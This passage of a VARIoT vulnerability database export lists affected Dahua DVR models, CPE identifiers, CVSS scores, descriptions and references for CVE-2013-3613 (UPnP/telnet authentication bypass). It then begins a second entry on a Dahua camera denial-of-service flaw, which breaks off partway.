            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr3204hf-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr3204lf-al",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr3204lf-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr3224l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr3232l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5104c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5104h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5104he",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5108c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5108h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5108he",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5116c",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5116h",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5116he",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5204a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5204l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5208a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5208l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5216a",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5216l",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5404",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5408",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5416",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5804",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5808",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr5816",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dvr6404lf-s",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dvr appliances",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr6404lf-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-u-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-u-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3232l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3204lf-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-l-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-a-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-s-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-s-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-al-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5204l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5216l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-a:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5116c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108he:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hd-l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hd-l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3224l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-a-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5404:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5408:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5416:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5208a:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5216a:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5104h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5108h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116he:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104hc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108hc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116hc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-u:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hd-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3204hf-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2404lf-al:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3204lf-al:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-al-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5804:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5808:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5816:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5104he:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5108he:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5116he:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5104c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2404hf-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-u-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2404lf-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hd-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-l-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-a-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-s-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-al-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5208l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5204a:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5116h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5108c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104he:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Andrey Bezborodov, Kirill Ermakov, Alexander Raspopov, and Dmitry Sklyarov of Positive Technologies.",
        "sources": [
          {
            "db": "BID",
            "id": "62402"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2013-3613",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.8,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2013-3613",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2013-13179",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2013-3613",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2013-13179",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201309-263",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DVR appliances do not properly restrict UPnP requests, which makes it easier for remote attackers to obtain access via vectors involving a replay attack against the TELNET port. Digital video recorders (DVR) produced by Dahua Technology Co., Ltd. contain multiple vulnerabilities that could allow a remote attacker to gain privileged access to the devices. Dahua Security DVR Appliances accept UPnP requests from external untrusted devices, which can cause the telnet port of the DVR application device to be automatically redirected and accessed by external entities. These default conditions allow external attackers to detect the device and use the built-in account to authenticate. Access the device. \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "db": "CERT/CC",
            "id": "VU#800094"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "db": "BID",
            "id": "62402"
          }
        ],
        "trust": 3.15
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#800094",
            "trust": 4.1
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "62402",
            "trust": 1.5
          },
          {
            "db": "JVN",
            "id": "JVNVU99181254",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800094"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "db": "BID",
            "id": "62402"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "id": "VAR-201309-0168",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:09:08.237000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.3,
            "url": "http://www.kb.cert.org/vuls/id/800094"
          },
          {
            "trust": 0.8,
            "url": "about vulnerability notes"
          },
          {
            "trust": 0.8,
            "url": "contact us about this vulnerability"
          },
          {
            "trust": 0.8,
            "url": "provide a vendor statement"
          },
          {
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3613"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu99181254"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3613"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/bid/62402"
          },
          {
            "trust": 0.3,
            "url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800094"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "db": "BID",
            "id": "62402"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#800094"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "db": "BID",
            "id": "62402"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-09-13T00:00:00",
            "db": "CERT/CC",
            "id": "VU#800094"
          },
          {
            "date": "2013-09-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "date": "2013-09-13T00:00:00",
            "db": "BID",
            "id": "62402"
          },
          {
            "date": "2013-09-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "date": "2013-09-17T12:04:24.757000",
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "date": "2013-09-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2013-12-04T00:00:00",
            "db": "CERT/CC",
            "id": "VU#800094"
          },
          {
            "date": "2013-09-23T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2013-13179"
          },
          {
            "date": "2013-09-13T00:00:00",
            "db": "BID",
            "id": "62402"
          },
          {
            "date": "2013-09-19T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-004184"
          },
          {
            "date": "2013-09-17T18:35:37.030000",
            "db": "NVD",
            "id": "CVE-2013-3613"
          },
          {
            "date": "2017-05-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua Security DVRs contain multiple vulnerabilities",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800094"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201309-263"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202206-2212

    Vulnerability from variot - Updated: 2023-12-18 11:51

    When an attacker obtaining the administrative account and password, or through a man-in-the-middle attack, the attacker could send a specified crafted packet to the vulnerable interface then lead the device to crash. ipc-hdbw2431e-s-s2 firmware, ipc-hdbw2831e-s-s2 firmware, ipc-hdbw2230e-s-s2 firmware etc. Dahua Technology Co., Ltd There are unspecified vulnerabilities in the product.Information is obtained and service operation is interrupted (DoS) It may be in a state. Dahua IPC-HFW2XXX, etc. are all products of China Dahua (Dahua) company. Dahua IPC-HFW2XXX is an IP camera. Dahua IPC-HDBW2XXX is a series of cameras. Dahua ASI7XXXX is a series of face recognition access controller

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
